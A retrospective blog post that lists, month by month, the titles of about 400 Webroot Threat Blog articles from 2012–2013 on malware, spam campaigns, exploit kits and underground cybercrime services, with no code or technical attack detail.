Historical OSINT - Summarizing 2 Years of Webroot’s Threat Blog Posts Research (2018-07-28 21:00)

It’s been several years since I last posted a quality update at the industry’s leading threat-intelligence gathering [1]Webroot’s Threat Blog following a successful career as lead security blogger and threat-intelligence analyst throughout 2012-2014.

In this post I’ll summarize two years’ worth of Webroot’s Threat Blog research with the idea to provide readers with the necessary data, information and knowledge to stay ahead of current and emerging threats.

01. January - 2012

• [2]Cybercriminals generate malicious Java applets using DIY tools

• [3]A peek inside the uBot malware bot

• [4]Researchers intercept a client-side exploits serving malware campaign

• [5]How phishers launch phishing attacks

• [6]A peek inside the Umbra malware loader

• [7]How malware authors evade antivirus detection

• [8]Inside AnonJDB – a Java based malware distribution platforms for drive-by downloads

• [9]Zappos.com hacked, 24 million users affected

• [10]Inside a clickjacking/likejacking scam distribution platform for Facebook

• [11]A peek inside the Cythosia v2 DDoS Bot

• [12]A peek inside the PickPocket Botnet

• [13]Mass SQL injection attack affects over 200,000 URLs

• [14]Email hacking for hire going mainstream

• [15]Millions of harvested emails offered for sale

02. February - 2012

• [16]Research: Google’s reCAPTCHA under fire

• [17]Spamvertised ‘You have 1 lost message on Facebook’ campaign leads to pharmaceutical scams

• [18]A peek inside the Smoke Malware Loader

• [19]Researchers spot Citadel, a ZeuS crimeware variant

• [20]Researchers intercept two client-side exploits serving malware campaigns

• [21]Pharmaceutical scammers launch their own Web contest

• [22]The United Nations hacked, Team Poison claims responsibility

• [23]Report: Internet Explorer 9 leads in socially-engineered malware protection

• [24]Twitter adds HTTPS support by default

• [25]Spamvertised “Hallmark ecard” campaign leads to malware

• [26]Report: 3,325 % increase in malware targeting the Android OS

• [27]Why relying on antivirus signatures is simply not enough anymore

• [28]Researchers intercept malvertising campaign using Yahoo’s ad network

• [29]A peek inside the Ann Malware Loader

• [30]Spamvertised ‘Termination of your CPA license’ campaign serving client-side exploits

• [31]How cybercriminals monetize malware-infected hosts

• [32]A peek inside the Elite Malware Loader

• [33]BlackHole exploit kits gets updated with new features

03. March - 2012

• [34]New service converts malware-infected hosts into anonymization proxies

• [35]Spamvertised ‘Temporary Limit Access To Your Account’ emails lead to Citi phishing emails

• [36]A peek inside the Darkness (Optima) DDoS Bot

• [37]Research: proper screening could have prevented 67 % of abusive domain registrations

• [38]Spamvertised ‘Your accountant license can be revoked’ emails lead to client-side exploits and malware

• [39]Spamvertised ‘Google Pharmacy’ themed emails lead to pharmaceutical scams

• [40]Research: U.S accounts for 72 % of fraudulent pharmaceutical orders

• [41]Millions of harvested U.S government and U.S military email addresses offered for sale

• [42]Trojan Downloaders actively utilizing Dropbox for malware distribution

• [43]Spamvertised ‘Your tax return appeal is declined’ emails serving client-side exploits and malware

• [44]Malicious USPS-themed emails circulating in the wild

• [45]Spamvertised LinkedIn notifications serving client-side exploits and malware

• [46]Tens of thousands of web sites affected in ongoing mass SQL injection attack

• [47]Spamvertised Verizon-themed ‘Your Bill Is Now Available’ emails lead to ZeuS crimeware

• [48]Spamvertised ‘Scan from a Hewlett-Packard ScanJet’ emails lead to client-side exploits and malware

04. April - 2012

• [49]Email hacking for hire going mainstream – part two

• [50]Spamvertised ‘US Airways’ themed emails serving client-side exploits and malware

• [51]New underground service offers access to hundreds of hacked PCs

• [52]New DIY email harvester released in the wild

05. May - 2012

• [53]Managed SMS spamming services going mainstream

• [54]A peek inside a boutique cybercrime-friendly E-shop

• [55]Cybercriminals release ‘Sweet Orange’ – new web malware exploitation kit

• [56]Spamvertised ‘Pizzeria Order Details’ themed campaign serving client-side exploits and malware

• [57]Poison Ivy trojan spreading across Skype

• [58]A peek inside a managed spam service

• [59]Ongoing ‘LinkedIn Invitation’ themed campaign serving client-side exploits and malware

• [60]Spamvertised bogus online casino themed emails serving adware

• [61]Spamvertised ‘YouTube Video Approved’ and ‘Twitter Support” themed emails lead to pharmaceutical scams

• [62]A peek inside a boutique cybercrime-friendly E-shop – part two

• [63]Spamvertised CareerBuilder themed emails serving client-side exploits and malware

• [64]Pop-ups at popular torrent trackers serving W32/Casonline adware

• [65]‘Windstream bill’ themed emails serving client-side exploits and malware

06. June - 2012

• [66]Cybercriminals infiltrate the music industry by offering full newly released albums for just $1

• [67]A peek inside a boutique cybercrime-friendly E-shop – part three

• [68]DDoS for hire services offering to ‘take down your competitor’s web sites’ going mainstream

• [69]Skype propagating Trojan targets Syrian activists

• [70]Spamvertised ‘UPS Delivery Notification’ emails serving client-side exploits and malware

• [71]Spamvertised ‘DHL Package delivery report’ emails serving malware

• [72]Spamvertised ‘Your Amazon.com order confirmation’ emails serving client-side exploits and malware

• [73]Cybercriminals populate Scribd with bogus adult content, spread malware using Comodo Backup

• [74]Spamvertised ‘Your Paypal Ebay.com payment’ emails serving client-side exploits and malware

• [75]‘Create a Cartoon of You” ads serving MyWebSearch toolbar

• [76]Spamvertised ‘Your UPS delivery tracking’ emails serving client-side exploits and malware

• [77]Spamvertised ‘Confirm PayPal account” notifications lead to phishing sites

• [78]Spamvertised ‘DHL Express Parcel Tracking Notification’ emails serving malware

• [79]Spamvertised bogus online casino themed emails serving W32/Casonline

07. July - 2012

• [80]Cybercriminals launch managed SMS flooding services

• [81]117,000 unique U.S visitors offered for malware conversion

• [82]Phishing campaign targeting Gmail, Yahoo, AOL and Hotmail spotted in the wild

• [83]What’s the underground market’s going rate for a thousand U.S based malware infected hosts?

• [84]Spamvertised American Airlines themed emails lead to Black Hole exploit kit

• [85]Online dating scam campaign currently circulating in the wild

• [86]New Russian service sells access to compromised social networking accounts

• [87]Cybercriminals impersonate UPS in client-side exploits and malware serving spam campaign

• [88]Russian Ask.fm spamming tool spotted in the wild

• [89]Spamvertised Intuit themed emails lead to Black Hole exploit kit

• [90]Cybercriminals impersonate Booking.com, serve malware using bogus ‘Hotel Reservation Confirmation’ themed emails

• [91]Spamvertised Craigslist themed emails lead to Black Hole exploit kit

• [92]Cybercriminals impersonate law enforcement, spamvertise malware-serving ‘Speeding Ticket’ themed emails

• [93]Spamvertised ‘Download your USPS Label’ themed emails serve malware

• [94]Cybercriminals target Twitter, spread thousands of exploits and malware serving tweets

• [95]Russian spammers release Skype spamming tool

• [96]Spamvertised ‘Your Ebay funds are cleared’ themed emails lead to Black Hole exploit kit

08. August - 2012

• [97]Spamvertised AICPA themed emails lead to Black Hole exploit kit

• [98]Spamvertised ‘PayPal has sent you a bank transfer’ themed emails lead to Black Hole exploit kit

• [99]Ongoing spam campaign impersonates LinkedIn, serves exploits and malware

• [100]Millions of spamvertised emails lead to W32/Casonline

• [101]Cybercriminals impersonate AT&T’s Billing Service, serve exploits and malware

• [102]IRS themed spam campaign leads to Black Hole exploit kit

• [103]Cybercriminals spamvertise bogus greeting cards, serve exploits and malware

• [104]Spamvertised ‘Federal Tax Payment Rejected’ themed emails lead to Black Hole exploit kit

• [105]Spamvertised ‘Fwd: Scan from a Hewlett-Packard ScanJet’ emails lead to Black Hole exploit kit

• [106]Spamvertised ‘Royal Mail Shipping Advisory’ themed emails serve malware

• [107]Cybercriminals impersonate Intuit Market, mass mail millions of exploits and malware serving emails

• [108]Cybercriminals spamvertise PayPay themed ‘Notification of payment received’ emails, serve malware

• [109]Cybercriminals impersonate UPS, serve malware

09. September - 2012

• [110]Spamvertised ‘Wire Transfer Confirmation’ themed emails lead to Black Hole exploit kit

• [111]Intuit themed ‘QuickBooks Update: Urgent’ emails lead to Black Hole exploit kit

• [112]Cybercriminals resume spamvertising bogus greeeting cards, serve exploits and malware

• [113]Cybercriminals abuse Skype’s SMS sending feature, release DIY SMS flooders

• [114]New Russian service sells access to thousands of automatically registered accounts

• [115]Spamvertised ‘Your Fedex invoice is ready to be paid now’ themed emails lead to Black Hole Exploit kit

• [116]New Russian DIY SMS flooder using ICQ’s SMS sending feature spotted in the wild

• [117]Spamvertised ‘US Airways reservation confirmation’ themed emails serve exploits and malware

• [118]Cybercriminals impersonate FDIC, serve client-side exploits and malware

• [119]Managed Ransomware-as-a-Service spotted in the wild

• [120]A peek inside a boutique cybercrime-friendly E-shop – part four

• [121]New E-shop selling stolen credit cards data spotted in the wild

• [122]From Russia with iPhone selling affiliate networks

• [123]New Russian DIY DDoS bot spotted in the wild

10. October - 2012

• [124]New Russian DIY DDoS bot spotted in the wild

• [125]Recently launched E-shop sells access to hundreds of hacked PayPal accounts

• [126]New Russian service sells access to compromised Steam accounts

• [127]‘Vodafone Europe: Your Account Balance’ themed emails serve malware

• [128]Cybercriminals impersonate UPS, serve client-side exploits and malware

• [129]‘Your video may have illegal content’ themed emails serve malware

• [130]Cybercriminals spamvertise ‘Amazon Shipping Confirmation’ themed emails, serve client-side exploits and malware

• [131]American Airlines themed emails lead to the Black Hole Exploit Kit

• [132]Bogus Facebook notifications lead to malware

• [133]Spamvertised ‘KLM E-ticket’ themed emails serve malware

• [134]‘Intuit Payroll Confirmation inquiry’ themed emails lead to the Black Hole exploit kit

• [135]Malware campaign spreading via Facebook direct messages spotted in the wild

• [136]‘Regarding your Friendster password’ themed emails lead to Black Hole exploit kit

• [137]Russian cybercriminals release new DIY DDoS malware loader

• [138]PayPal ‘Notification of payment received’ themed emails serve malware

• [139]Cybercriminals impersonate Delta Airlines, serve malware

• [140]‘Your UPS Invoice is Ready’ themed emails serve malware

• [141]Bogus Skype ‘Password successfully changed’ notifications lead to malware

• [142]Cybercriminals impersonate Verizon Wireless, serve client-side exploits and malware

• [143]Spamvertised ‘BT Business Direct Order’ themed emails lead to malware

• [144]Cybercriminals spamvertise millions of British Airways themed e-ticket receipts, serve malware

• [145]Cybercriminals spamvertise millions of bogus Facebook notifications, serve malware

• [146]Nuclear Exploit Pack goes 2.0

11. November - 2012

• [147]BofA ‘Online Banking Passcode Reset’ themed emails serve client-side exploits and malware

• [148]‘ADP Immediate Notification’ themed emails lead to Black Hole Exploit Kit

• [149]USPS ‘Postal Notification’ themed emails lead to malware

• [150]‘Fwd: Scan from a Xerox W. Pro’ themed emails lead to Black Hole Exploit Kit

• [151]‘Your Discover Card Services Blockaded’ themed emails serve client-side exploits and malware

• [152]‘Payroll Account Holded by Intuit’ themed emails lead to Black Hole Exploit Kit

• [153]‘American Express Alert: Your Transaction is Aborted’ themed emails serve client-side exploits and malware

• [154]Cybercriminals abuse major U.S SMS gateways, release DIY Mail-to-SMS flooders

• [155]‘PayPal Account Modified’ themed emails lead to Black Hole Exploit Kit

• [156]Bogus Better Business Bureau themed notifications serve client-side exploits and malware

• [157]Cybercriminals spamvertise bogus eFax Corporate delivery messages, serve multiple malware variants

• [158]Bogus IRS ‘Your tax return appeal is declined’ themed emails lead to malware

• [159]‘Copies of Missing EPLI Policies’ themed emails lead to Black Hole Exploit Kit

• [160]Cybercriminals spamvertise bogus ‘Microsoft License Orders’ serve client-side exploits and malware

• [161]Cybercriminals resume spamvertising ‘Payroll Account Cancelled by Intuit’ themed emails, serve client-side exploits and malware

• [162]Cybercriminals spamvertise millions of FDIC ‘Your activity is discontinued’ themed emails, serve client-side exploits and malware

• [163]Cybercriminals release stealthy DIY mass iFrame injecting Apache 2 modules

• [164]Multiple ‘Inter-company’ invoice themed campaigns serve malware and client-side exploits

• [165]Bogus Facebook ‘pending notifications’ themed emails serve client-side exploits and malware

• [166]Cybercriminals target U.K users with bogus ‘Pay by Phone Parking Receipts’ serve malware

• [167]Bogus DHL ‘Express Delivery Notifications’ serve malware

• [168]Cybercriminals impersonate Vodafone U.K, spread malicious MMS notifications

• [169]Cybercriminals impersonate T-Mobile U.K, serve malware

• [170]Bogus ‘Meeting Reminder” themed emails serve malware

• [171]Bogus ‘Intuit Software Order Confirmations’ lead to Black Hole Exploit Kit

• [172]Bogus ‘End of August Invoices’ themed emails serve malware and client-side exploits

12. December - 2012

• [173]DIY malicious domain name registering service spotted in the wild

• [174]Fake ‘FedEx Tracking Number’ themed emails lead to malware

• [175]Bogus ‘Facebook Account Cancellation Request’ themed emails serve client-side exploits and malware

• [176]Malicious ‘Security Update for Banking Accounts’ emails lead to Black Hole Exploit Kit

• [177]A peek inside a boutique cybercrime-friendly E-shop – part five

• [178]Fake ‘Flight Reservation Confirmations’ themed emails lead to Black Hole Exploit Kit

• [179]Malicious ‘Sendspace File Delivery Notifications’ lead to Black Hole Exploit Kit

• [180]Fake Chase ‘Merchant Billing Statement’ themed emails lead to malware

• [181]Cybercriminals entice potential cybercriminals into purchasing bogus credit cards data

• [182]Fake ‘Change Facebook Color Theme’ events lead to rogue Chrome extensions

• [183]Fake ‘Citi Account Alert’ themed emails lead to Black Hole Exploit Kit

• [184]Spamvertised ‘Work at Home” scams impersonating CNBC spotted in the wild

• [185]Pharmaceutical scammers spamvertise YouTube themed emails, entice users into purchasing counterfeit drugs

• [186]Cybercriminals resume spamvertising British Airways themed E-ticket receipts, serve malware

• [187]Fake ‘UPS Delivery Confirmation Failed’ themed emails lead to Black Hole Exploit Kit

12. January - 2013

• [188]Spamvertised ‘Your Recent eBill from Verizon Wireless’ themed emails serve client-side exploits and malware

• [189]Fake BBB (Better Business Bureau) Notifications lead to Black Hole Exploit Kit

• [190]‘Attention! Changes in the bank reports!’ themed emails lead to Black Hole Exploit Kit

• [191]Fake ‘You have made an Ebay purchase’ themed emails lead to client-side exploits and malware

• [192]A peek inside a boutique cybercrime-friendly E-shop – part six

• [193]Black Hole Exploit Kit author’s ‘vertical market integration’ fuels growth in malicious Web activity

• [194]Spamvertised AICPA themed emails serve client-side exploits and malware

• [195]‘Please confirm your U.S Airways online registration’ themed emails lead to Black Hole Exploit Kit

• [196]Malicious DIY Java applet distribution platforms going mainstream

• [197]Fake ‘ADP Speedy Notifications’ lead to client-side exploits and malware

• [198]Cybercriminals release automatic CAPTCHA-solving bogus Youtube account generating tool

• [199]‘Batch Payment File Declined’ EFTPS themed emails lead to Black Hole Exploit Kit

• [200]Cybercriminals resume spamvertising fake Vodafone ‘A new picture or video message’ themed emails, serve malware

• [201]Leaked DIY malware generating tool spotted in the wild

• [202]Email hacking for hire going mainstream – part three

• [203]Android malware spreads through compromised legitimate Web sites

• [204]Fake Intuit ‘Direct Deposit Service Informer’ themed emails lead to Black Hole Exploit Kit

• [205]Fake LinkedIn ‘Invitation Notifications’ themed emails lead to client-side exploits and malware

• [206]Novice cybercriminals experiment with DIY ransomware tools

• [207]Bogus ‘Your Paypal Transaction Confirmation’ themed emails lead to Black Hole Exploit Kit

• [208]Fake ‘FedEx Online Billing – Invoice Prepared to be Paid’ themed emails lead to Black Hole Exploit Kit

• [209]A peek inside a DIY password stealing malware

• [210]Malicious ‘Facebook Account Cancellation Request” themed emails serve client-side exploits and malware

12. February - 2013

• [211]Fake Booking.com ‘Credit Card was not Accepted’ themed emails lead to malware

• [212]Fake FedEx ‘Tracking ID/Tracking Number/Tracking Detail’ themed emails lead to malware

• [213]‘Your Kindle e-book Amazon receipt’ themed emails lead to Black Hole Exploit Kit

• [214]New DIY HTTP-based botnet tool spotted in the wild

• [215]Mobile spammers release DIY phone number harvesting tool

• [216]New underground service offers access to thousands of malware-infected hosts

• [217]Targeted ‘phone ring flooding’ attacks as a service going mainstream

• [218]Fake ‘You’ve blocked/disabled your Facebook account’ themed emails serve client-side exploits and malware

• [219]Spamvertised IRS ‘Income Tax Refund Turned Down’ themed emails lead to Black Hole Exploit Kit

• [220]Malware propagates through localized Facebook Wall posts

• [221]Malicious ‘RE: Your Wire Transfer’ themed emails serve client-side exploits and malware

• [222]New underground E-shop offers access to hundreds of hacked PayPal accounts

• [223]Fake ‘Verizon Wireless Statement” themed emails lead to Black Hole Exploit Kit

• [224]DIY malware cryptor as a Web service spotted in the wild

• [225]Malicious ‘Data Processing Service’ ACH File ID themed emails serve client-side exploits and malware

• [226]How mobile spammers verify the validity of harvested phone numbers

• [227]How much does it cost to buy 10,000 U.S.-based malware-infected hosts?

13. March - 2013

• [228]New DIY IRC-based DDoS bot spotted in the wild

• [229]Cybercriminals release new Java exploits centered exploit kit

• [230]Segmented Russian “spam leads” offered for sale

• [231]New DIY hacked email account content grabbing tool facilitates cyber espionage on a mass scale

• [232]New DIY unsigned malicious Java applet generating tool spotted in the wild

• [233]Commercial Steam ‘information harvester/mass group inviter’ could lead to targeted fraudulent campaigns

• [234]Fake BofA CashPro ‘Online Digital Certificate” themed emails lead to malware

• [235]Spamvertised BBB ‘Your Accreditation Terminated” themed emails lead to Black Hole Exploit Kit

• [236]New ZeuS source code based rootkit available for purchase on the underground market

• [237]Cybercriminals resume spamvertising ‘Re: Fwd: Wire Transfer’ themed emails, serve client-side exploits and malware

• [238]‘ADP Package Delivery Notification’ themed emails lead to Black Hole Exploit Kit

• [239]Cybercrime-friendly community branded HTTP/SMTP based keylogger spotted in the wild

• [240]Hacked PCs as ‘anonymization stepping-stones’ service operates in the open since 2004

• [241]Fake ‘CNN Breaking News Alerts’ themed emails lead to Black Hole Exploit Kit

• [242]Spotted: cybercriminals working on new Western Union based ‘money mule management’ script

• [243]Malicious ‘BBC Daily Email’ Cyprus bailout themed emails lead to Black Hole Exploit Kit

• [244]‘ADP Payroll Invoice’ themed emails lead to malware

• [245]‘Terminated Wire Transfer Notification/ACH File ID” themed malicious campaigns lead to Black Hole Exploit Kit

• [246]New DIY RDP-based botnet generating tool leaks in the wild

• [247]A peek inside the EgyPack Web malware exploitation kit

14. April - 2013

• [248]DIY Java-based RAT (Remote Access Tool) spotted in the wild

• [249]Spamvertised ‘Re: Changelog as promised’ themed emails lead to malware

• [250]Cybercrime-friendly service offers access to tens of thousands of compromised accounts

• [251]Madi/Mahdi/Flashback OS X connected malware spreading through Skype

• [252]Cybercriminals selling valid ‘business card’ data of company executives across multiple verticals

• [253]A peek inside the ‘Zerokit/0kit/ring0 bundle’ bootkit

• [254]DIY Skype ring flooder offered for sale

• [255]Spamvertised ‘Your order for helicopter for the weekend’ themed emails lead to malware

• [256]A peek inside a ‘life cycle aware’ underground market ad for a private keylogger

• [257]American Airlines ‘You can download your ticket’ themed emails lead to malware

• [258]Cybercriminals offer spam-friendly SMTP servers for rent [259]

• [260]How mobile spammers verify the validity of harvested phone numbers – part two

• [261]A peek inside a (cracked) commercially available RAT (Remote Access Tool)

• [262]DIY Russian mobile number harvesting tool spotted in the wild

• [263]DIY SIP-based TDoS tool/number validity checker offered for sale

• [264]CAPTCHA-solving Russian email account registration tool helps facilitate cybercrime

• [265]Historical OSINT – The ‘Boston Marathon explosion’ and ‘Fertilizer plant explosion in Texas’ themed malware campaigns

• [266]Fake ‘DHL Delivery Report’ themed emails lead to malware

• [267]Cybercriminals impersonate Bank of America (BofA), serve malware

• [268]How fraudulent blackhat SEO monetizers apply Quality Assurance (QA) to their DIY doorway generators

• [269]Managed ‘Russian ransomware’ as a service spotted in the wild

15. May - 2013

• [270]FedWire ‘Your Wire Transfer’ themed emails lead to malware

• [271]A peek inside a CVE-2013-0422 exploiting DIY malicious Java applet generating tool

• [272]New IRC/HTTP based DDoS bot wipes out competing malware

• [273]New version of DIY Google Dorks based mass website hacking tool spotted in the wild

• [274]Citibank ‘Merchant Billing Statement’ themed emails lead to malware

• [275]Fake Amazon ‘Your Kindle E-Book Order’ themed emails circulating in the wild, lead to client-side exploits and malware

• [276]Cybercriminals impersonate New York State’s Department of Motor Vehicles (DMV), serve malware

• [277]Cybercriminals offer HTTP-based keylogger for sale, accept Bitcoin

• [278]Newly launched E-shop for hacked PCs charges based on malware ‘executions’

• [279]New subscription-based ‘stealth Bitcoin miner’ spotted in the wild

• [280]Fake ‘Free Media Player’ distributed via rogue ‘Adobe Flash Player HD’ advertisement

• [281]New versatile and remote-controlled “Android.MouaBot” malware found in the wild

• [282]Newly launched ‘Magic Malware’ spam campaign relies on bogus ‘New MMS’ messages

• [283]Commercial ‘form grabbing’ rootkit spotted in the wild

• [284]DIY malware cryptor as a Web service spotted in the wild – part two

• [285]CVs and sensitive info soliciting email campaign impersonates NATO

• [286]New commercially available DIY invisible Bitcoin miner spotted in the wild

• [287]Fake ‘Export License/Payment Invoice’ themed emails lead to malware

• [288]Compromised Indian government Web site leads to Black Hole Exploit Kit

• [289]Cybercriminals resume spamvertising Citibank ‘Merchant Billing Statement’ themed emails, serve malware

• [290]Marijuana-themed DDoS for hire service spotted in the wild

• [291]Fake ‘Vodafone U.K Images’ themed malware serving spam campaign circulating in the wild

16. June - 2013

• [292]Compromised FTP/SSH account privilege-escalating mass iFrame embedding platform released on the underground marketplace

• [293]New E-shop sells access to thousands of hacked PCs, accepts Bitcoin

• [294]Pharmaceutical scammers impersonate Facebook’s Notification System, entice users into purchasing counterfeit drugs

• [295]iLivid ads lead to ‘Searchqu Toolbar/Search Suite’ PUA (Potentially Unwanted Application)

• [296]Hacked Origin, Uplay, Hulu Plus, Netflix, Spotify, Skype, Twitter, Instagram, Tumblr, Freelancer accounts offered for sale

• [297]Scammers impersonate the UN Refugee Agency (UNHCR), seek your credit card details

• [298]Fake ‘Unsuccessful Fax Transmission’ themed emails lead to malware

• [299]Tens of thousands of spamvertised emails lead to W32/Casonline

• [300]Rogue ads lead to SafeMonitorApp Potentially Unwanted Application (PUA)

• [301]How cybercriminals apply Quality Assurance (QA) to their malware campaigns before launching them

• [302]Rogue ads target EU users, expose them to Win32/Toolbar.SearchSuite through the KingTranslate PUA

• [303]New boutique iFrame crypting service spotted in the wild

• [304]Rogue ‘Oops Video Player’ attempts to visually social engineer users, mimicks Adobe Flash Player’s installation process

• [305]New E-Shop sells access to thousands of malware-infected hosts, accepts Bitcoin

• [306]New subscription-based SHA256/Scrypt supporting stealth DIY Bitcoin mining tool spotted in the wild

• [307]Rogue ‘Free Mozilla Firefox Download’ ads lead to ‘InstallCore’ Potentially Unwanted Application (PUA)

• [308]SIP-based API-supporting fake caller ID/SMS number supporting DIY Russian service spotted in the wild

• [309]Rogue ‘Free Codec Pack’ ads lead to Win32/InstallCore Potentially Unwanted Application (PUA)

• [310]Self-propagating ZeuS-based source code/binaries offered for sale

• [311]How cybercriminals create and operate Android-based botnets

17. July - 2013

• [312]Cybercriminals experiment with Tor-based C&C, ring-3-rootkit empowered, SPDY form grabbing malware bot

• [313]Deceptive ads targeting German users lead to the ‘W32/SomotoBetterInstaller’ Potentially Unwanted Application (PUA)

• [314]Newly launched underground market service harvests mobile phone numbers on demand

• [315]Novel ransomware tactic locks users’ PCs, demands that they participate in a survey to get the unlock code

• [316]Spamvertised ‘Export License/Invoice Copy’ themed emails lead to malware

• [317]Cybercriminals spamvertise tens of thousands of fake ‘Your Booking Reservation at Westminster Hotel’ themed emails, serve malware

• [318]New commercially available mass FTP-based proxy-supporting doorway/malicious script uploading application spotted in the wild

• [319]Fake ‘iGO4 Private Car Insurance Policy Amendment Certificate’ themed emails lead to malware

• [320]Tens of thousands of spamvertised emails lead to the Win32/PrimeCasino PUA (Potentially Unwanted Application)

• [321]Spamvertised ‘Vodafone U.K MMS ID/Fake Sage 50 Payroll’ themed emails lead to (identical) malware

• [322]New commercially available Web-based WordPress/Joomla brute-forcing tool spotted in the wild

• [323]Rogue ads targeting German users lead to Win32/InstallBrain PUA (Potentially Unwanted Application)

• [324]Yet another commercially available stealth Bitcoin/Litecoin mining tool spotted in the wild

• [325]Protected: Deceptive ‘Media Player Update’ ads expose users to the rogue ‘Video Downloader/Bundlore’ Potentially Unwanted Application (PUA)

• [326]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercriminals with bulletproof hosting capabilities

• [327]Fake ‘Copy of Vodafone U.K Contract/Your Monthly Vodafone Bill is Ready/New MMS Received’ themed emails lead to malware

• [328]Rogue ads lead to the ‘Free Player’ Win32/Somoto Potentially Unwanted Application (PUA)

• [329]How much does it cost to buy one thousand Russian/Eastern European based malware-infected hosts?

• [330]Custom USB sticks bypassing Windows 7/8’s AutoRun protection measure going mainstream

• [331]DIY commercially-available ‘automatic Web site hacking as a service’ spotted in the wild

18. August - 2013

• [332]‘Malware-infected hosts as stepping stones’ service offers access to hundreds of compromised U.S based hosts

• [333]New ‘Hacked shells as a service’ empowers cybercriminals with access to high page rank-ed Web sites

• [334]Fake ‘iPhone Picture Snapshot Message’ themed emails lead to malware

• [335]Malicious Bank of America (BofA) ‘Statement of Expenses’ themed emails lead to client-side exploits and malware

• [336]Cybercriminals spamvertise fake ‘O2 U.K MMS’ themed emails, serve malware

• [337]One-stop-shop for spammers offers DKIM-verified SMTP servers, harvested email databases and training to potential customers

• [338]Fake ‘Apple Store Gift Card’ themed emails serve client-side exploits and malware

• [339]Newly launched managed ‘malware dropping’ service spotted in the wild

• [340]Cybercrime-friendly underground traffic exchange helps facilitate fraudulent and malicious activity

• [341]From Vietnam with tens of millions of harvested emails, spam-ready SMTP servers and DIY spamming tools

• [342]DIY Craigslist email collecting tools empower spammers with access to fresh/valid email addresses

• [343]Bulletproof TDS/Doorways/Pharma/Spam/Warez hosting service operates in the open since 2009

• [344]DIY automatic cybercrime-friendly ‘redirectors generating’ service spotted in the wild

• [345]Cybercriminals offer spam-ready SMTP servers for rent/direct managed purchase

• [346]Cybercrime-friendly underground traffic exchanges help facilitate fraudulent and malicious activity – part two

19. September - 2013

• [347]DIY malicious Android APK generating ‘sensitive information stealer’ spotted in the wild

• [348]Web-based DNS amplification DDoS attack mode supporting PHP script spotted in the wild

• [349]Managed Malicious Java Applets Hosting Service Spotted in the Wild

• [350]Affiliate network for mobile malware impersonates Google Play, tricks users into installing premium-rate SMS sending rogue apps

• [351]419 advance fee fraudsters abuse CNN’s ‘Email This’ Feature, spread Syrian Crisis themed scams

• [352]Cybercriminals offer anonymous mobile numbers for ‘SMS activation’, video tape the destruction of the SIM card on request

• [353]Yet another ‘malware-infected hosts as anonymization stepping stones’ service offering access to hundreds of compromised hosts spotted in the wild

• [354]Cybercriminals experiment with ‘Socks4/Socks5/HTTP’ malware-infected hosts based DIY DoS tool

• [355]Cybercriminals sell access to tens of thousands of malware-infected Russian hosts

• [356]Spamvertised “FDIC: Your business account” themed emails serve client-side exploits and malware

• [357]Cybercriminals experiment with Android compatible, Python-based SQL injecting releases

• [358]Newly launched E-shop offers access to hundreds of thousands of compromised accounts

• [359]DIY commercial CAPTCHA-solving automatic email account registration tool available on the underground market since 2008

• [360]Yet another subscription-based stealth Bitcoin mining tool spotted in the wild

20. October - 2013

• [361]A peek inside a Blackhat SEO/cybercrime-friendly doorways management platform

• [362]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercriminals with bulletproof hosting capabilities – part two [363]

• [364]‘T-Mobile MMS message has arrived’ themed emails lead to malware

• [365]DDoS for hire vendor ‘vertically integrates’ starts offering TDoS attack capabilities

• [366]Commercially available Blackhat SEO enabled multi-third-party product licenses empowered VPSs spotted in the wild

• [367]New cybercrime-friendly iFrames-based E-shop for traffic spotted in the wild

• [368]Cybercriminals offer spam-friendly SMTP servers for rent – part two

• [369]Newly launched VDS-based cybercrime-friendly hosting provider helps facilitate fraudulent/malicious online activity

• [370]Fake ‘You have missed emails’ GMail themed emails lead to pharmaceutical scams

• [371]Compromised Turkish Government Web site leads to malware

• [372]Novice cyberciminals offer commercial access to five mini botnets

• [373]Spamvertised T-Mobile ‘Picture ID Type:MMS” themed emails lead to malware

• [374]Yet another Bitcoin accepting E-shop offering access to thousands of hacked PCs spotted in the wild

• [375]Malicious ‘FW: File’ themed emails lead to malware

• [376]Mass iframe injection campaign leads to Adobe Flash exploits

• [377]Rogue ads lead to the ‘Mipony Download Accelerator/FunMoods Toolbar’ PUA (Potentially Unwanted Application)

• [378]A peek inside the administration panel of a standardized E-shop for compromised accounts

• [379]U.K users targeted with fake ‘Confirming your Sky offer’ malware serving emails

• [380]New DIY compromised hosts/proxies syndicating tool spotted in the wild

• [381]Rogue ads lead to the ‘EzDownloaderpro’ PUA (Potentially Unwanted Application)

• [382]Fake ‘Scanned Image from a Xerox WorkCentre’ themed emails lead to malware

• [383]Fake ‘Important: Company Reports’ themed emails lead to malware

• [384]Cybercriminals release new commercially available Android/BlackBerry supporting mobile malware bot

• [385]Fake WhatsApp ‘Voice Message Notification/1 New Voicemail’ themed emails lead to malware

21. November - 2013

• [386]Google-dorks based mass Web site hacking/SQL injecting tool helps facilitate malicious online activity

• [387]Deceptive ads lead to the SpyAlertApp PUA (Potentially Unwanted Application)

• [388]Cybercriminals differentiate their ‘access to compromised PCs’ service proposition, emphasize on the prevalence of ‘female bot slaves’

• [389]New vendor of ‘professional DDoS for hire service’ spotted in the wild

• [390]Source code for proprietary spam bot offered for sale, acts as force multiplier for cybercrime-friendly activity

• [391]Low Quality Assurance (QA) iframe campaign linked to May’s Indian government Web site compromise spotted in the wild

• [392]Popular French torrent portal tricks users into installing the BubbleDock/Downware/DownloadWare PUA (Potentially Unwanted Application)

• [393]Web site of Brazilian ‘Prefeitura Municipal de Jaqueira’ compromised, leads to fake Adobe Flash player

• [394]Malicious multi-hop iframe campaign affects thousands of Web sites, leads to a cocktail of client-side exploits

• [395]Vendor of TDoS products/services releases new multi-threaded SIP-based TDoS tool

• [396]Cybercriminals spamvertise tens of thousands of fake ‘Sent from my iPhone’ themed emails, expose users to malware

• [397]Fake ‘Annual Form (STD-261) – Authorization to Use Privately Owned Vehicle on State Business’ themed emails lead to malware

• [398]‘Newly released proxy-supporting Origin brute-forcing tools targets users with weak passwords’

• [399]Fake WhatsApp ‘Voice Message Notification’ themed emails expose users to malware

• [400]Cybercriminals impersonate HSBC through fake ‘payment e-Advice’ themed emails, expose users to malware

• [401]Fake ‘MMS Gallery’ notifications impersonate T-Mobile U.K, expose users to malware

• [402]Fake ‘October’s Billing Address Code’ (BAC) form themed spam campaign leads to malware

21. December - 2013

• [403]Cybercrime-friendly VPN service provider pitches itself as being ‘recommended by Edward Snowden’

• [404]Commercial Windows-based compromised Web shells management application spotted in the wild

• [405]Compromised legitimate Web sites expose users to malicious Java/Symbian/Android “Browser Updates”

